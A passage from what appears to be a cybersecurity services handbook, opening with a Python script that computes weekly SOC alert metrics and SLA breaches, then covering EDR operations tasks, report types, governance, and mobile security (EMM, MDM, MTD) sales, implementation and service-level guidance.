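     "acknowledged": "2024-05-13T02:25:00", "resolved": "2024-05-13T05:40:00",
     "verdict": "true_positive"},
    {"id": "A-1002", "severity": "high", "detected": "2024-05-13T09:00:00",
     "acknowledged": "2024-05-13T10:30:00", "resolved": "2024-05-13T16:00:00",
     "verdict": "true_positive"},
    {"id": "A-1003", "severity": "medium", "detected": "2024-05-14T11:00:00",
     "acknowledged": "2024-05-14T11:20:00", "resolved": "2024-05-14T12:00:00",
     "verdict": "false_positive"},
    {"id": "A-1004", "severity": "critical", "detected": "2024-05-15T22:00:00",
     "acknowledged": "2024-05-15T23:10:00", "resolved": "2024-05-16T06:00:00",
     "verdict": "true_positive"},
    {"id": "A-1005", "severity": "low", "detected": "2024-05-16T08:00:00",
     "acknowledged": "2024-05-16T13:00:00", "resolved": "2024-05-17T09:00:00",
     "verdict": "false_positive"},
    {"id": "A-1006", "severity": "high", "detected": "2024-05-17T14:00:00",
     "acknowledged": "2024-05-17T14:10:00", "resolved": None,  # still open
     "verdict": "true_positive"},
]

# Assumed SLA targets in minutes per severity: (time to acknowledge, time to resolve).
SLA_MINUTES = {
    "critical": (15, 240),
    "high": (60, 480),
    "medium": (240, 1440),
    "low": (480, 2880),
}

# When the weekly report is produced; open alerts are measured against this instant.
REPORT_TIME = "2024-05-20T09:00:00"


def minutes_between(start, end):
    """Elapsed minutes between two ISO-8601 timestamps."""
    return (datetime.fromisoformat(end) - datetime.fromisoformat(start)).total_seconds() / 60


def weekly_metrics(alerts, sla, now):
    """Compute the week's MTTA, MTTR, false-positive rate and SLA breaches."""
    ack_times, res_times, breaches, by_severity = [], [], [], {}
    false_positives = 0
    for a in alerts:
        sev = a["severity"]
        by_severity[sev] = by_severity.get(sev, 0) + 1
        if a["verdict"] == "false_positive":
            false_positives += 1
        ack_target, res_target = sla[sev]
        ack = minutes_between(a["detected"], a["acknowledged"])
        ack_times.append(ack)
        if ack > ack_target:
            breaches.append((a["id"], "acknowledge", round(ack)))
        if a["resolved"] is None:
            # Open alert: it has already breached if the clock since detection passed the target.
            elapsed = minutes_between(a["detected"], now)
            if elapsed > res_target:
                breaches.append((a["id"], "resolve", round(elapsed)))
        else:
            res = minutes_between(a["detected"], a["resolved"])
            res_times.append(res)
            if res > res_target:
                breaches.append((a["id"], "resolve", round(res)))
    return {
        "alerts": len(alerts),
        "by_severity": by_severity,
        "false_positive_rate_pct": round(100.0 * false_positives / len(alerts), 1),
        "mtta_min": round(mean(ack_times), 1),
        "mttr_min": round(mean(res_times), 1) if res_times else None,
        "open": [a["id"] for a in alerts if a["resolved"] is None],
        "sla_breaches": breaches,
    }


def status_lines(m):
    """The few lines a manager would carry into the weekly status update."""
    lines = [
        f"Alerts: {m['alerts']} ({', '.join(f'{k}={v}' for k, v in sorted(m['by_severity'].items()))})",
        f"False-positive rate: {m['false_positive_rate_pct']}%",
        f"MTTA: {m['mtta_min']} min, MTTR: {m['mttr_min']} min, open: {len(m['open'])}",
    ]
    lines += [f"SLA breach: {aid} {stage} after {mins} min" for aid, stage, mins in m["sla_breaches"]]
    return lines


if __name__ == "__main__":
    print("\n".join(status_lines(weekly_metrics(ALERTS, SLA_MINUTES, REPORT_TIME))))
```

MTTR is computed over resolved alerts only, so an open alert does not drag the average down while still showing up as a breach; the false-positive rate is reported separately because a falling MTTR with a rising false-positive rate usually means analysts are closing noise quickly rather than handling threats faster.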

Sl No. | Head | Particulars | Frequency
1 | Monthly Performance Review | Conduct a comprehensive review of the EDR service's performance over the past month, analyzing incident response metrics, detection rates, and overall effectiveness. | Monthly
2 | Resource Planning | Assess the workload and resource allocation within the EDR Service Engineer team. Plan for any necessary adjustments or additional resources. | Monthly
3 | Service Level Agreement (SLA) Review | Evaluate the team's adherence to SLAs and identify areas for improvement in meeting response and resolution targets. | Monthly
4 | Incident Trend Analysis | Analyze incident trends over the past month to identify recurring threats or areas where additional preventive measures may be needed. | Monthly
5 | Security Awareness Initiatives | Plan and execute security awareness initiatives for employees to enhance their understanding of cybersecurity best practices and how to utilize the EDR solution effectively. | Monthly
6 | Collaboration with Security Vendors | Engage with representatives and other security vendors to discuss ongoing challenges, feature requests, and opportunities for further integration. | Monthly
7 | Continuous Improvement Initiatives | Develop improvement plans based on identified trends and areas of opportunity, with a focus on enhancing the overall efficiency and efficacy of the EDR service. | Monthly
8 | Risk Assessment and Mitigation | Perform a risk assessment to identify potential vulnerabilities or gaps in the EDR infrastructure, and create plans to mitigate those risks. | Monthly
9 | Vendor Performance Evaluation | Evaluate the performance and support provided by as a vendor, providing feedback and addressing any concerns or issues. | Monthly
10 | Stakeholder Communication | Update key stakeholders, including upper management and other security teams, on the status of the EDR service and any notable developments. | Monthly
11 | Long-Term EDR Strategy Development | Collaborate with other security leaders to develop a long-term EDR strategy that aligns with the organization's cybersecurity objectives and business goals. | Monthly
12 | Review and Update Incident Response Playbooks | Ensure that incident response playbooks are updated with the latest threat intelligence and response strategies. | Monthly
13 | Budget Review and Planning | Collaborate with finance and upper management to review the budget allocated to the EDR service and plan for future budget needs. | Monthly
14 | Employee Performance and Development | Conduct performance evaluations for the EDR Service Engineer team, provide feedback, and identify opportunities for professional development. | Monthly
15 | Customer Feedback Analysis | Review customer feedback and satisfaction scores to identify areas for improvement in customer service and support. | Monthly

Sl No. | Head | Particulars | Frequency
1 | Quarterly Performance Evaluation | Conduct a comprehensive evaluation of the EDR service's performance and effectiveness over the past quarter. Analyze incident trends, response times, and customer satisfaction metrics. | Quarterly
2 | Strategic Roadmap Review | Review and update the strategic roadmap for the EDR service, ensuring alignment with the organization's evolving cybersecurity strategy. | Quarterly
3 | Quarterly Business Review (QBR) | Prepare and conduct a Quarterly Business Review with upper management and key stakeholders, highlighting the achievements, challenges, and future plans of the EDR service. | Quarterly
4 | EDR Solution Enhancement Evaluation | Assess the need for any enhancements or upgrades to the EDR solution to optimize its capabilities and align with emerging threats. | Quarterly
5 | Security Posture Assessment | Conduct a comprehensive assessment of the organization's overall security posture, focusing on the impact and effectiveness of the EDR service. | Quarterly
6 | Risk Management Review | Review the risk management strategies in place, including threat modeling and vulnerability assessments, to ensure that risks are effectively mitigated. | Quarterly
7 | Long-Term Resource Planning | Plan for long-term resource requirements, including staffing, training, and technology investments, to support the EDR service's growth. | Quarterly
8 | Compliance Audit | Perform a compliance audit to ensure that the EDR service meets relevant regulatory requirements and industry standards. | Quarterly
9 | Vendor Performance Evaluation | Evaluate the performance and effectiveness of as a vendor, assessing support responsiveness and product updates. | Quarterly
10 | Incident Response Exercise | Conduct a simulated incident response exercise to test the EDR service's capabilities and the team's readiness to handle complex security incidents. | Quarterly
11 | EDR Service Engineer Team Assessment | Review the performance and development needs of the EDR Service Engineer team. Identify areas for improvement and plan training initiatives. | Quarterly
12 | Threat Intelligence Integration Review | Assess the effectiveness of integrating external threat intelligence feeds into the EDR solution and adjust the integration strategy as needed. | Quarterly
13 | Third-Party Vendor Assessment | Perform a risk assessment of third-party vendors and suppliers to ensure they meet the organization's security requirements. | Quarterly
14 | Customer Feedback Analysis | Review customer feedback and satisfaction scores for the quarter, and address any concerns or suggestions from customers. | Quarterly
15 | Budget Reevaluation | Reevaluate the cybersecurity budget for the upcoming quarters, considering new requirements and lessons learned from the past quarter. | Quarterly

3.4.9 Reports- Anti-Virus Operations

Anti-virus operation reports typically include the following:


1. Anti-virus scan results report: A report that shows the results of regular anti-virus
scans, including any malware detections and the actions taken to remediate them.
2. Security incident report: A report that details any security incidents that occurred
during the reporting period, including the type of incident, the cause, and the steps
taken to mitigate the risk.
3. Vulnerability assessment report: A report that details the results of regular
vulnerability assessments, including any potential security weaknesses and the steps
taken to address them.
4. Security audit report: A report that details the results of regular security audits,
including any findings or recommendations for improvement.
5. User access report: A report that provides a detailed view of user access to systems
and data, including which users have accessed what resources and when.
6. License management report: A report that provides an overview of software licenses
and usage, including the number of licenses in use and any licenses that are due to
expire.
7. Network activity report: A report that provides a detailed view of network activity,
including any unusual or potentially malicious traffic.
In short, anti-virus operation reports provide valuable insights into the security of a
computer or network and are essential for understanding the effectiveness of the anti-virus
solution and for identifying areas for improvement.

3.4.10 Reports- EDR Operations

EDR operation reports typically include the following:


1. Incident Summary Report: Provides an overview of recent security incidents detected
by the EDR solution, including incident types, affected endpoints, and actions taken.
2. Threat Detection Report: Details information about detected threats, such as
malware, ransomware, or suspicious behaviour, including the affected endpoint,
timestamp, and threat severity.
3. Alert Report: Lists alerts generated by the EDR solution, including information on the
triggering event, alert category, and recommended actions.
4. Endpoint Activity Report: Offers a summary of activities and events on individual
endpoints, such as application executions, file changes, and network connections.
5. User Behaviour Report: Analyses user activity and behaviour on endpoints to identify
unusual or potentially malicious actions.
6. Vulnerability Assessment Report: Provides information on vulnerabilities found on
endpoints, including severity ratings and recommended remediation actions.

7. Policy Violation Report: Lists instances where security policies were violated on
endpoints, such as unauthorized software installations or configuration changes.
8. Threat Hunting Report: Summarizes proactive threat hunting activities, including
searches for suspicious patterns or indicators of compromise.
9. Forensic Investigation Report: Details the findings of forensic investigations conducted
in response to security incidents, including evidence collected and conclusions drawn.
10. Compliance Report: Assesses the organization's compliance with security standards,
regulations, or internal policies and identifies areas that may need attention.
11. Data Exfiltration Report: Highlights incidents or activities involving the unauthorized
transfer of data from endpoints to external sources.
12. Endpoint Health Report: Evaluates the overall health and security status of endpoints,
including patch management, system updates, and antivirus status.
13. Network Traffic Analysis Report: Analyses network traffic originating from or directed
at endpoints to identify suspicious or malicious communication.
14. Malicious Behaviour Analysis Report: Provides in-depth analysis of specific malicious
behaviours or incidents, including tactics, techniques, and procedures (TTPs) used by
attackers.
15. Security Dashboard: Presents a visual summary of key security metrics, incidents, and
trends for quick at-a-glance monitoring.
16. Historical Trend Analysis Report: Shows historical data on security incidents, alert
volumes, and threat trends over time, aiding in long-term security planning.
17. Custom Reports: Allows organizations to create custom reports tailored to their
specific requirements, incorporating selected data and metrics.
These reports play a crucial role in helping organizations understand their security posture,
respond to threats, meet compliance requirements, and make informed decisions to
strengthen their cybersecurity defences. The availability and format of these reports may vary
across different EDR solutions, so it's essential to review the documentation provided by your
chosen EDR vendor to fully understand the reporting capabilities.

3.4.11 Governance of Antivirus solution

The governance of an antivirus solution refers to the policies, processes, and practices that
are put in place to manage, monitor, and maintain the solution over time. The goal of antivirus
governance is to ensure that the solution is effective, efficient, and aligned with the needs
and goals of the organization. Some key aspects of antivirus governance include:
1. Policy development: Developing clear policies that outline the scope, purpose, and use
of the antivirus solution, as well as the responsibilities of users and administrators.
2. Deployment planning: Carefully planning and executing the deployment of the
antivirus solution, including considerations such as testing, training, and support.

3. Configuration management: Ensuring that the antivirus solution is configured and
maintained in accordance with established policies and best practices, including
updating virus definitions and making any necessary changes to settings.
4. Monitoring and reporting: Regularly monitoring the performance and effectiveness of
the antivirus solution, and providing regular reports on its status, health, and usage.
5. Incident response: Establishing clear processes and procedures for responding to
security incidents and potential threats, including the involvement of internal teams
and external partners as needed.
6. Compliance: Ensuring that the antivirus solution follows relevant regulations,
standards, and best practices, such as data privacy laws, industry standards, and
security guidelines.
7. User education and training: Providing users with the knowledge and skills needed to
use the antivirus solution effectively and safely, including regular training on security
awareness and best practices.
These are just some of the key aspects of antivirus governance. The specific policies and
procedures will depend on the needs and goals of the organization, as well as the scope and
complexity of the antivirus solution. It's important to regularly review and update the
governance framework as needed to ensure that the antivirus solution remains effective and
relevant over time. Work with client teams to baseline, benchmark, and build and implement
these governance steps.

3.4.12 Governance of EDR solution

The governance of an EDR (Endpoint Detection and Response) solution involves establishing
policies, procedures, and controls to effectively manage and secure the use of the EDR
technology within an organization. Proper governance ensures that the EDR solution aligns
with the organization's security objectives, compliance requirements, and overall IT strategy.
Here's a step-by-step guide on how to govern an EDR solution effectively:
1. Define Governance Objectives: Clearly define the goals and objectives of governing
the EDR solution. Consider factors such as improving cybersecurity posture, reducing
incident response times, and ensuring compliance with industry regulations.
2. Establish a Governance Team: Form a cross-functional governance team that includes
representatives from IT, security, compliance, legal, and other relevant departments.
Assign roles and responsibilities within the team.
3. Develop EDR Policies and Procedures: Create comprehensive policies and procedures
specifically related to the use of the EDR solution. These documents should cover areas
such as incident response, data privacy, access control, and compliance.
4. Policy Review and Approval: Ensure that the EDR policies and procedures are reviewed
and approved by senior management or relevant stakeholders. Obtain their buy-in and
support.

5. Training and Awareness: Provide training and awareness programs for employees who
will be using the EDR solution. Ensure they understand their roles and responsibilities
regarding EDR governance.
6. Access Control and Authorization: Define access control policies that specify who has
access to the EDR solution, what level of access they have, and under what conditions.
Implement strong authentication mechanisms.
7. Data Privacy and Compliance: Address data privacy concerns and compliance
requirements, particularly if the EDR solution processes sensitive data. Ensure that the
solution aligns with relevant regulations (e.g., Indian IT Act, The Digital Personal Data
Protection Act, Reserve Bank of India, Insurance Regulatory and Development
Authority of India, Securities and Exchange Board of India, National Payments
Corporation of India, CERT-In, CEA (Cyber Security in Power Sector), HIPAA, GDPR, or
any other domestic or international regulation, directions, guidelines).
8. Incident Response Plan: Integrate the EDR solution into your organization's incident
response plan. Clearly define procedures for responding to security incidents detected
by the EDR tool.
9. Change Management: Implement change management processes to ensure that any
changes to the EDR solution, such as updates or configurations, are well-documented
and approved.
10. Monitoring and Audit Trails: Establish procedures for monitoring the EDR solution's
performance and generating audit trails of activities. Regularly review these logs for
anomalies and compliance checks.
11. Documentation and Record Keeping: Maintain comprehensive records related to the
EDR solution, including policies, configurations, incident reports, and audit logs.
12. Vendor Relationship Management: If the EDR solution is provided by a third-party
vendor, manage the vendor relationship effectively. Ensure they provide updates,
support, and adhere to service level agreements (SLAs).
13. Continuous Improvement: Regularly assess the effectiveness of your EDR governance
framework and make improvements as needed. Stay updated on emerging threats and
technologies.
14. Incident Reporting and Escalation: Establish clear reporting and escalation procedures
for security incidents detected by the EDR solution. Ensure that the appropriate teams
are notified promptly.
15. Review and Compliance Audits: Periodically review the EDR governance framework
and conduct compliance audits to ensure that the organization is adhering to its
policies and procedures.
16. Communication and Collaboration: Foster collaboration between IT, security, and
other relevant departments to ensure that EDR governance aligns with the
organization's broader goals and initiatives.
17. Senior Management Engagement: Engage senior management in the governance
process to ensure ongoing support, resource allocation, and alignment with the
organization's strategic objectives.

By establishing a robust governance framework for your EDR solution, you can enhance its
effectiveness, reduce security risks, and ensure that it contributes positively to your
organization's overall cybersecurity strategy.

4. Endpoint Security- Mobile Security
Mobile security refers to the measures taken to protect mobile devices such as smartphones
and tablets from cyber threats, data theft, and unauthorized access. This includes using secure
passwords and lock screens, avoiding public Wi-Fi, installing anti-virus software, keeping the
operating system and apps up to date, and being cautious of suspicious links or emails.
Additionally, using encrypted messaging and storage apps and regularly backing up important
data can also help enhance mobile security.
4.1 What is a mobile threat defence solution?

A mobile threat defense (MTD) solution is a type of software designed to protect mobile
devices against various security threats such as malware, malicious apps, phishing attacks,
and unauthorized access. MTD solutions typically use a combination of technologies such as
endpoint protection, mobile device management (MDM), mobile application management
(MAM), and threat intelligence to secure devices and protect sensitive data. Some MTD
solutions also provide features such as real-time monitoring, device management, and
reporting to help organizations manage and mitigate mobile security risks. The goal of MTD is
to prevent data breaches and protect sensitive information on mobile devices, both for
personal and business use.
4.1.1 EMM, MDM, MTD: What are these?

Enterprise Mobility Management (EMM), Mobile Device Management (MDM), and Mobile
Threat Defense (MTD) are related to securing mobile devices but serve different purposes.
EMM is a broader concept that encompasses MDM and provides additional functions beyond
just device management. EMM solutions provide a comprehensive approach to managing and
securing mobile devices, applications, and data across an organization. EMM solutions
typically include MDM capabilities, but also provide additional features such as mobile
application management (MAM), security and access control, and the ability to manage both
corporate and personal devices.
MDM refers to the process of managing and securing mobile devices such as smartphones
and tablets that are used for both personal and business purposes. MDM solutions provide
centralized control over devices, allowing IT administrators to manage device configurations,
enforce security policies, and remotely wipe devices in case of theft or loss.
MTD, on the other hand, is a type of software that focuses on protecting mobile devices from
specific security threats such as malware, phishing attacks, and unauthorized access. MTD
solutions typically use threat intelligence and endpoint protection to provide real-time
monitoring and protection against security threats.
A 20-point comparison is given in the table below:

Sl No | Category | Elements | EMM MDM MTD
1 | Device Management | Remote Lock or wipe | Yes Yes
2 | Device Management | Apply enterprise policies on mobiles | Yes Yes
3 | Device Management | Enforce mobile device encryption | Yes Yes
4 | Device Management | Enforce business data encryption on mobiles | Yes
5 | Device Management | Enforce device password | Yes Yes
6 | Device Management | Enforce VPN | Yes Yes
7 | Device Management | Advanced jailbreak/root detection, Risky device configurations | Yes
8 | Device Management | On-device App-based threat protection- Malware, spyware, rootkits, ransomware | Yes
9 | Device Management | On-device phishing protection | Yes
10 | Device Management | Remote observability of high risk and malicious events | Yes
11 | Device Management | Network-based threat protection- Man in the Middle, SSL | Yes
12 | Device Apps Management | Malicious App Detection and Analysis | Yes
13 | Device Apps Management | Enterprise software/ app mobile vulnerability detection | Yes
14 | Device Apps Management | Block apps on mobiles | Yes Yes Yes
15 | Device Apps Management | Block URLs- Web & Content-based threat protection | Yes Yes Yes
16 | Device Apps Management | Remote app deployment and updates | Yes
17 | Device Apps Management | Control Access to apps and data as per enterprise policy | Yes
18 | Device Apps Management | Containerise personal and enterprise business data | Yes
19 | Device Features compatibility | iOS, Android, and ChromeOS compatibility | Partial Partial Partial
20 | Device Features compatibility | Device Battery hogger | Partial Partial Partial

In summary, EMM provides the most comprehensive solution for managing and securing the
entire mobile ecosystem within an organization, MDM provides the core set of device
management and control functions, and MTD focuses specifically on security, protecting
devices against specific security threats. In many cases, to provide a comprehensive mobile
device security solution, organizations use both EMM/ MDM and MTD solutions.

4.1.2 EMM, MDM, MTD types

There are several types of Enterprise Mobility Management (EMM), Mobile Device
Management (MDM), and Mobile Threat Defense (MTD) solutions available on the market:
EMM:
1. Full-fledged EMM: Provides a comprehensive solution for managing and securing
mobile devices, applications, and data across an organization.
2. Standalone EMM: Focuses on a specific aspect of EMM, such as mobile application
management (MAM) or security.
MDM:
1. On-premises MDM: Software installed on an organization's internal servers to manage
and secure mobile devices.
2. Cloud-based MDM: Manages and secures mobile devices through a cloud-based
solution.
MTD:

Page 38 of 52 Open to all


1. Real-time MTD: Provides real-time monitoring and protection against security threats.
2. On-demand MTD: Scans devices for threats on-demand, such as when prompted by
the user.
It is important to note that some EMM solutions also include MTD capabilities, while some
MTD solutions may also include some MDM features. Organizations can choose a solution
based on their specific needs and requirements.
4.2 Sales cue- Questions to ask and answers to give

4.2.1 Questions to ask prospective client

When evaluating Enterprise Mobility Management (EMM), Mobile Device Management
(MDM), or Mobile Threat Defense (MTD) solutions, it is important to ask the right questions
to ensure that the solution meets your prospective client’s specific needs and requirements.
Here are some questions you may want to ask your prospective client:
EMM:
1. What type of devices does the EMM solution need to support?
2. Does the EMM solution need to support both corporate and personal devices?
3. What security and access control features need to be included in the EMM solution?
4. How does the EMM solution need to handle mobile application management (MAM)?
5. What is the deployment model for the EMM solution (cloud-based or on-premises)?
MDM:
1. What type of devices does the MDM solution need to support?
2. How does the MDM solution need to enforce security policies on mobile devices?
3. What remote management features need to be included in the MDM solution?
4. How does the MDM solution need to handle device enrolment and configuration?
5. What is the deployment model for the MDM solution (cloud-based or on-premises)?
MTD:
1. Does the MTD solution need to provide real-time monitoring and protection against
security threats?
2. How does the MTD solution need to detect and prevent malware and phishing
attacks?
3. What types of security threats does the MTD solution need to protect against?
4. How does the MTD solution need to integrate with other security solutions (e.g.,
firewalls, intrusion detection systems)?
5. What is the deployment model for the MTD solution (cloud-based or on-premises)?
It is recommended to ask the prospective client about their problem areas and use-cases, in
order to understand the solution's real-world effectiveness and benefits for organizations
similar to theirs.
4.2.2 Questions prospective client will ask of sales

Clients evaluating Enterprise Mobility Management (EMM), Mobile Device Management
(MDM), or Mobile Threat Defense (MTD) solutions may have a variety of questions based on
their specific needs and requirements. Here are some common questions that clients ask:
EMM:
1. Can the EMM solution manage and secure both corporate and personal devices?
2. How does the EMM solution handle mobile application management (MAM)?
3. What security and access control features are included in the EMM solution?
4. How easy is it to deploy and manage the EMM solution?
5. How does the EMM solution handle data protection and privacy?
MDM:
1. What type of devices does the MDM solution support?
2. How does the MDM solution enforce security policies on mobile devices?
3. Can IT administrators manage and secure devices remotely?
4. How easy is it to enrol and configure devices in the MDM solution?
5. What types of reporting and analytics are available in the MDM solution?
MTD:
1. Does the MTD solution provide real-time monitoring and protection against security
threats?
2. How does the MTD solution detect and prevent malware and phishing attacks?
3. What types of security threats does the MTD solution protect against?
4. How does the MTD solution integrate with other security solutions (e.g., firewalls,
intrusion detection systems)?
5. What is the impact on device performance when the MTD solution is installed?
It is recommended to provide clear and concise answers to these questions, and to
demonstrate how the solution addresses the client's specific requirements and concerns.
Additionally, it may be helpful to provide relevant case studies or client references to show
how the solution has benefited similar organizations.
4.2.3 Payment terms to agree with the clients

All EMM, MDM, MTD technology owners ask for advance payments, almost always 100% in
advance. So, unless clients pay similarly, the service providers come under heavy cash-flow
pressure. Therefore, agreeing on 100% advance payments or back-to-back (client pays the
services/ system integrator, and the system integrator pays the EMM, MDM, MTD technology
owners via distributors) payment options with clients always keeps the cash-registers green and
healthy.
The payment terms for Enterprise Mobility Management (EMM), Mobile Device Management
(MDM), or Mobile Threat Defense (MTD) solutions can vary depending on the specific
solution. Here are some common payment terms that service providers may agree with clients
and with EMM, MDM, MTD technology owners:
1. Subscription-based: Clients pay a recurring fee (e.g., monthly, or annually) for access
to the EMM, MDM, or MTD solution. This model is commonly used for cloud-based
solutions.
2. Per-device pricing: Clients pay a fee for each device that is enrolled in the EMM, MDM,
or MTD solution. This model is commonly used for on-premises solutions.
3. Volume pricing: Clients receive discounts based on the number of devices enrolled in
the EMM, MDM, or MTD solution.
4. Licensing: Clients pay a one-time fee for a license to use the EMM, MDM, or MTD
solution. This model is commonly used for on-premises solutions.
It is important to carefully review and understand the payment terms before entering into an
agreement. It is also recommended to discuss and negotiate any potential discounts or
incentives that may be available, based on the number of devices enrolled or the length of
the agreement. The specific payment terms will depend on the solution being offered. It's
always recommended to carefully review the terms and conditions of an EMM, MDM, or MTD
solution before making a purchase.
4.3 Pre-sales cue: Solution building complexities

4.3.1 Sizing the solution

Sizing an Enterprise Mobility Management (EMM), Mobile Device Management (MDM), or
Mobile Threat Defense (MTD) solution involves determining the appropriate resources and
capacities required to effectively manage and secure mobile devices in your organization.
Here are some factors to consider when sizing an EMM, MDM, or MTD solution:
1. Number of devices: The number of mobile devices in your organization is a key factor
in determining the appropriate resources and capacities required for the EMM, MDM,
or MTD solution.
2. Types of devices: The types of devices used in your organization (e.g., smartphones,
tablets, laptops) can impact the resources and capacities required for the EMM, MDM,
or MTD solution.
3. Security requirements: The level of security required for your organization's mobile
devices will impact the resources and capacities required for the EMM, MDM, or MTD
solution.
4. User requirements: The specific requirements of your users (e.g., device management,
application management, data protection) can impact the resources and capacities
required for the EMM, MDM, or MTD solution.
5. Deployment model: The deployment model for the EMM, MDM, or MTD solution (e.g.,
cloud-based, on-premises) can impact the resources and capacities required for the
solution.

It is important to work closely with the technology owner and client to ensure that the EMM,
MDM, or MTD solution is appropriately sized for the organization's specific requirements. The
technology owner and client should be able to provide guidance and recommendations based
on the organization's specific needs and requirements.
4.3.2 To what will the EMM, MDM, or MTD solution connect?

Enterprise Mobility Management (EMM), Mobile Device Management (MDM), and Mobile
Threat Defense (MTD) solutions can integrate with a variety of other systems to enhance their
functionality and capabilities. Some common systems that may connect to an EMM, MDM, or
MTD solution include:
1. Active Directory (AD): Integration with AD allows for seamless user authentication and
authorization within the EMM, MDM, or MTD solution.
2. Identity and Access Management (IAM) systems: Integration with IAM systems can
enhance the security of the EMM, MDM, or MTD solution by providing additional
layers of authentication and authorization.
3. Mobile Application Management (MAM) solutions: Integration with MAM solutions
can enhance the application management capabilities of the EMM, MDM, or MTD
solution.
4. Mobile content management systems: Integration with mobile content management
systems can enhance the data protection and privacy capabilities of the EMM, MDM,
or MTD solution.
5. Email systems: Integration with email systems can enhance the email management
capabilities of the EMM, MDM, or MTD solution.
6. Network security solutions: Integration with network security solutions (e.g., firewalls,
intrusion detection systems) can enhance the security of the EMM, MDM, or MTD
solution by providing additional layers of protection.
It is important to carefully evaluate the integration requirements of the organization's systems
and to work with the System Integrator to ensure that the EMM, MDM, or MTD solution
integrates with the necessary systems. The System Integrator should be able to provide
guidance and recommendations on the most appropriate integration approach.

4.3.3 Implementation steps of EMM, MDM, MTD solution

The implementation of an Enterprise Mobility Management (EMM), Mobile Device
Management (MDM), or Mobile Threat Defense (MTD) solution typically involves the
following steps:
1. Requirements gathering: This involves identifying the specific requirements of the
organization for mobile device management, security, and data protection.
2. Solution selection: This involves selecting the appropriate EMM, MDM, or MTD
solution for the organization based on the requirements gathered in the first step.
3. Installation: The installation of an Enterprise Mobility Management (EMM), Mobile
Device Management (MDM), or Mobile Threat Defense (MTD) solution typically
involves the following steps:
a. Prepare the environment: This involves verifying that the necessary hardware,
software, and network infrastructure is in place to support the EMM, MDM, or
MTD solution.
b. Download the software: This involves downloading the EMM, MDM, or MTD
software from the vendor's website or through a distribution channel.
c. Install the software: This involves installing the EMM, MDM, or MTD software
on the necessary servers, devices, or gateways.
d. Configure the solution: This involves configuring the EMM, MDM, or MTD
solution to meet the specific requirements of the organization. This may include
setting up device policies, configuring security settings, and integrating with
other systems as needed.
e. Deploy the solution: This involves deploying the EMM, MDM, or MTD solution
to the organization's users. This may involve installing software on devices,
enrolling devices in the solution, and configuring devices to meet the
organization's requirements.
f. Test the solution: This involves testing the EMM, MDM, or MTD solution to
ensure that it is functioning as expected.
4. Solution configuration: This involves configuring the EMM, MDM, or MTD solution to
meet the specific requirements of the organization. This may include setting up device
policies, configuring security settings, and integrating with other systems as needed.
5. User training: This involves providing training to the organization's users on how to use
the EMM, MDM, or MTD solution. This may include training on how to enrol devices,
manage device policies, and access data and applications securely.
6. Deployment: This involves deploying the EMM, MDM, or MTD solution to
the organization's users. This may involve installing software on devices, enrolling devices
in the solution, and configuring devices to meet the organization's requirements.
7. Monitoring and maintenance: These involve monitoring the EMM, MDM, or MTD
solution to ensure that it is functioning as expected, and performing maintenance and
updates as needed to keep the solution up-to-date and secure.
These are the general steps involved in implementing an EMM, MDM or MTD solution. The
specific steps will depend on the needs and requirements of the organization, as well as the
solution being used.
4.3.4 What can go wrong in EMM, MDM, MTD solution

There are several things that can go wrong when implementing an Enterprise Mobility
Management (EMM), Mobile Device Management (MDM), or Mobile Threat Defense (MTD)
solution, including:
1. Complexity: The implementation and use of an EMM, MDM, or MTD solution can be
complex and require a significant investment of time and resources.
2. Integration challenges: Integrating the EMM, MDM, or MTD solution with other
systems, such as email, file storage, and security systems, can be challenging and may
require significant effort and expertise.
3. User adoption: Getting users to adopt the EMM, MDM, or MTD solution can be a
challenge, particularly if the solution is perceived as cumbersome or difficult to use.
4. Performance issues: The EMM, MDM, or MTD solution can impact the performance of
devices, leading to slow response times, battery drain, and other issues.
5. Data security: Ensuring that sensitive data is protected and remains secure can be a
challenge with an EMM, MDM, or MTD solution.
6. Compliance challenges: Ensuring that the EMM, MDM, or MTD solution is compliant
with various regulations and standards can be a complex and time-consuming process.
7. Vendor support: Ensuring that the vendor provides adequate support, and that the
solution is up-to-date and secure can be a challenge.
These are just some of the potential issues that can arise when implementing an EMM, MDM,
or MTD solution. It's important to carefully consider these risks and take steps to mitigate them,
such as properly configuring the solution, keeping the solution and its threat definitions
up-to-date, and providing user education and training.
4.3.5 What Service Levels can be committed/ expected?

Service Level Agreements (SLAs) in EMM, MDM, or MTD services can vary depending on the
specific needs of an organization and the level of service offered by the provider. However,
some common SLAs that can be committed in an EMM, MDM, or MTD solution include:
1. Availability: The percentage of time that the EMM, MDM, or MTD solution is available
and accessible to users.
2. Response time: The amount of time it takes for the vendor to respond to support
requests or incidents.
3. Resolution time: The amount of time it takes for the technology owner to resolve
support requests or incidents.
4. Upgrades: The frequency and timing of software upgrades and patches provided by
the vendor.
5. Data protection: The level of protection provided for sensitive data stored or
processed by the EMM, MDM, or MTD solution.
6. Compliance: The level of compliance with various regulations and standards required
by the organization.
7. Training: The level of training provided to users and administrators on the use of the
EMM, MDM, or MTD solution.
These are just a few examples of the types of SLAs that can be committed in EMM, MDM, or
MTD services. The specific SLAs that are included in a contract will depend on the needs and
requirements of the organization. But, please keep in mind, it is not always possible to
accurately provide a resolution time commitment, and hence penalty conditions in contracts
should be considered carefully before they are accepted.
4.3.6 Why can't any vendor commit resolution time/ SLA accurately?

Accurately providing a resolution time commitment in cybersecurity is challenging for several
reasons:
1. Complexity of security incidents: Cybersecurity incidents can range from simple
malware infections to complex, multi-faceted attacks that are difficult to fully
understand and resolve. This makes it difficult to accurately predict the amount of
time it will take to resolve a given incident.
2. Evolving threats: The nature of cyber threats is constantly evolving, with new and more
sophisticated attacks appearing all the time. This means that even experienced
cybersecurity teams may encounter new and unexpected challenges when attempting
to resolve an incident, which can make it difficult to provide accurate resolution time
commitments.
3. Interdependencies: Many cybersecurity incidents involve multiple systems and
technologies and resolving one issue may require resolving multiple underlying issues.
This can make it difficult to accurately predict the amount of time it will take to fully
resolve an incident.
4. Limited information: In many cases, the information available about a cybersecurity
incident may be limited or incomplete, making it difficult to accurately assess the
scope of the issue and predict the amount of time it will take to resolve.
Given these challenges, it is not always possible to accurately provide a resolution time
commitment in cybersecurity. Instead, cybersecurity teams may aim to provide a range of
possible resolution times, or a commitment to resolve the incident as quickly as possible,
while ensuring that all necessary steps are taken to thoroughly resolve the issue and prevent
future incidents.
4.4 Delivery cue- EMM MDM MTD operations

4.4.1 Daily Activities

Daily EMM MDM MTD operation activities typically include the following tasks:
1. Monitoring: Regularly monitoring the EMM, MDM, or MTD solution to ensure that it
is functioning properly and to identify any issues or potential threats.
2. Device management: Managing and updating the configurations of mobile devices,
including enrolling new devices, managing device profiles, and securing devices.
